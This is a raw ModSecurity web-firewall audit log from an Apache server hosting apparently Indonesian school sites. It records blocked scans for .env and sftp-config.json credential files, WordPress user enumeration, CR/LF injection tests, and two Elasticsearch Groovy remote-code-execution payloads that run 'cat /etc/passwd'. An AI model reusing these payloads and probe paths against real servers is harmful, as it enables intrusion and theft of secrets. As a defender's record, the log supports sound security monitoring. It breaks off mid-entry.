REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748768632914896 3360 (- - -) Stopwatch2: 1748768632914896 3360; combined=1442, p1=491, p2=915, p3=0, p4=0, p5=35, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46160549-Z-- --27544421-A-- [01/Jun/2025:16:07:12 +0700] aDwYQEaTRmdfB-FaJjnhTgAAABU 103.236.140.4 53266 103.236.140.4 8181 --27544421-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --27544421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27544421-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748768832556632 735 (- - -) Stopwatch2: 1748768832556632 735; combined=322, p1=280, p2=0, p3=0, p4=0, p5=41, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27544421-Z-- --f82a2c30-A-- [01/Jun/2025:16:14:50 +0700] aDwaCgQHT18O7PnXxsQymQAAAJQ 103.236.140.4 53302 103.236.140.4 8181 --f82a2c30-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.215.65.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.215.65.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f82a2c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f82a2c30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748769290436368 3409 (- - -) Stopwatch2: 1748769290436368 3409; combined=1388, p1=468, p2=890, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f82a2c30-Z-- --86832860-A-- [01/Jun/2025:16:29:47 +0700] aDwdi-4LjVe0Eerk_ZavJQAAAEg 103.236.140.4 53370 103.236.140.4 8181 --86832860-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --86832860-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86832860-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748770187419358 825 (- - -) Stopwatch2: 1748770187419358 825; combined=321, p1=278, p2=0, p3=0, p4=0, p5=42, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86832860-Z-- --b4ae5b7f-A-- [01/Jun/2025:17:09:02 +0700] aDwmvgQHT18O7PnXxsQy9gAAAIA 103.236.140.4 55050 103.236.140.4 8181 --b4ae5b7f-B-- POST /website/blog/ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 22 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 198.252.110.114 Cookie: X-Varnish: 170113681 --b4ae5b7f-C-- { "name": "test" } --b4ae5b7f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4ae5b7f-E-- --b4ae5b7f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(\\n|\\r)" at ARGS_NAMES:{\r\n "name": "test"\r\n}. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "145"] [id "217291"] [rev "2"] [msg "HTTP Header Injection Attack via payload (CR/LF detected)||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d found within ARGS_NAMES:{\x5cr\x5cn \x22name\x22: \x22test\x22\x5cr\x5cn}: {\x0d\x0a \x22name\x22: \x22test\x22\x0d\x0a}"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748772542594796 5288 (- - -) Stopwatch2: 1748772542594796 5288; combined=2924, p1=727, p2=2163, p3=0, p4=0, p5=33, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4ae5b7f-Z-- --93e6aa10-A-- [01/Jun/2025:17:09:02 +0700] aDwmvu4LjVe0Eerk_ZawBgAAAFU 103.236.140.4 55058 103.236.140.4 8181 --93e6aa10-B-- POST /_search HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 169 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 198.252.110.114 Cookie: X-Varnish: 170113684 --93e6aa10-C-- {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}} --93e6aa10-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93e6aa10-E-- --93e6aa10-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748772542661586 2224 (- - -) Stopwatch2: 1748772542661586 2224; combined=798, p1=471, p2=292, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93e6aa10-Z-- --89888024-A-- [01/Jun/2025:17:15:45 +0700] aDwoUQQHT18O7PnXxsQ5_wAAAIA 103.236.140.4 46570 103.236.140.4 8181 --89888024-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.117.232.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.117.232.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --89888024-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89888024-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748772945603187 4033 (- - -) Stopwatch2: 1748772945603187 4033; combined=2252, p1=697, p2=1520, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89888024-Z-- --d367ab3f-A-- [01/Jun/2025:17:16:18 +0700] aDwockaTRmdfB-FaJjnm8gAAAA8 103.236.140.4 48256 103.236.140.4 8181 --d367ab3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 91.144.45.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.144.45.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d367ab3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d367ab3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748772978897965 3797 (- - -) Stopwatch2: 1748772978897965 3797; combined=1819, p1=549, p2=1237, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d367ab3f-Z-- --9f2f3615-A-- [01/Jun/2025:17:18:59 +0700] aDwpE-4LjVe0Eerk_Za18AAAAFQ 103.236.140.4 56002 103.236.140.4 8181 --9f2f3615-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 --9f2f3615-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f2f3615-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748773139725941 1796 (- - -) Stopwatch2: 1748773139725941 1796; combined=1068, p1=977, p2=0, p3=0, p4=0, p5=91, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f2f3615-Z-- --a6d2e634-A-- [01/Jun/2025:18:07:28 +0700] aDw0cO4LjVe0Eerk_Za_5AAAAEI 103.236.140.4 41684 103.236.140.4 8181 --a6d2e634-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.26.90.247 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.26.90.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: */* --a6d2e634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6d2e634-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748776048279496 794 (- - -) Stopwatch2: 1748776048279496 794; combined=336, p1=294, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6d2e634-Z-- --c3942102-A-- [01/Jun/2025:18:14:47 +0700] aDw2JwQHT18O7PnXxsRFbgAAAIE 103.236.140.4 41744 103.236.140.4 8181 --c3942102-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 203.146.45.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.146.45.76 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 --c3942102-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3942102-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748776487980552 905 (- - -) Stopwatch2: 1748776487980552 905; combined=334, p1=292, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3942102-Z-- --0422f131-A-- [01/Jun/2025:18:14:50 +0700] aDw2KgQHT18O7PnXxsRFcwAAAI8 103.236.140.4 41754 103.236.140.4 8181 --0422f131-B-- GET /.vscode/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 203.146.45.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.146.45.76 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 --0422f131-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0422f131-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748776490362844 741 (- - -) Stopwatch2: 1748776490362844 741; combined=303, p1=271, p2=0, p3=0, p4=0, p5=32, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0422f131-Z-- --231aa06c-A-- [01/Jun/2025:18:31:25 +0700] aDw6DQQHT18O7PnXxsRFiQAAAIU 103.236.140.4 41920 103.236.140.4 8181 --231aa06c-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept-Charset: utf-8 --231aa06c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --231aa06c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748777485557946 852 (- - -) Stopwatch2: 1748777485557946 852; combined=352, p1=312, p2=0, p3=0, p4=0, p5=40, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --231aa06c-Z-- --5704df42-A-- [01/Jun/2025:18:43:28 +0700] aDw84AQHT18O7PnXxsRFjgAAAJA 103.236.140.4 42042 103.236.140.4 8181 --5704df42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --5704df42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5704df42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748778208772597 800 (- - -) Stopwatch2: 1748778208772597 800; combined=320, p1=281, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5704df42-Z-- --4254b02b-A-- [01/Jun/2025:18:58:18 +0700] aDxAWgQHT18O7PnXxsRFoQAAAIA 103.236.140.4 42424 103.236.140.4 8181 --4254b02b-B-- POST /website/blog/ HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 22 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded --4254b02b-C-- { "name": "test" } --4254b02b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4254b02b-E-- --4254b02b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(\\n|\\r)" at ARGS_NAMES:{\r\n "name": "test"\r\n}. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "145"] [id "217291"] [rev "2"] [msg "HTTP Header Injection Attack via payload (CR/LF detected)||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d found within ARGS_NAMES:{\x5cr\x5cn \x22name\x22: \x22test\x22\x5cr\x5cn}: {\x0d\x0a \x22name\x22: \x22test\x22\x0d\x0a}"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748779098732151 3087 (- - -) Stopwatch2: 1748779098732151 3087; combined=1856, p1=419, p2=1410, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4254b02b-Z-- --b84d9803-A-- [01/Jun/2025:18:58:18 +0700] aDxAWu4LjVe0Eerk_ZbAXQAAAEE 103.236.140.4 42426 103.236.140.4 8181 --b84d9803-B-- POST /_search HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 169 User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3.1 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded --b84d9803-C-- {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}} --b84d9803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b84d9803-E-- --b84d9803-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748779098795896 1613 (- - -) Stopwatch2: 1748779098795896 1613; combined=595, p1=410, p2=158, p3=0, p4=0, p5=26, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b84d9803-Z-- --f551cb14-A-- [01/Jun/2025:19:06:30 +0700] aDxCRu4LjVe0Eerk_ZbAbAAAAFY 103.236.140.4 42490 103.236.140.4 8181 --f551cb14-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.37.205.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.37.205.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f551cb14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f551cb14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748779590167215 2630 (- - -) Stopwatch2: 1748779590167215 2630; combined=1199, p1=390, p2=780, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f551cb14-Z-- --860cb37b-A-- [01/Jun/2025:19:13:41 +0700] aDxD9UaTRmdfB-FaJjnzyAAAAAo 103.236.140.4 42646 103.236.140.4 8181 --860cb37b-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 128.199.182.55 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 128.199.182.55 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --860cb37b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --860cb37b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 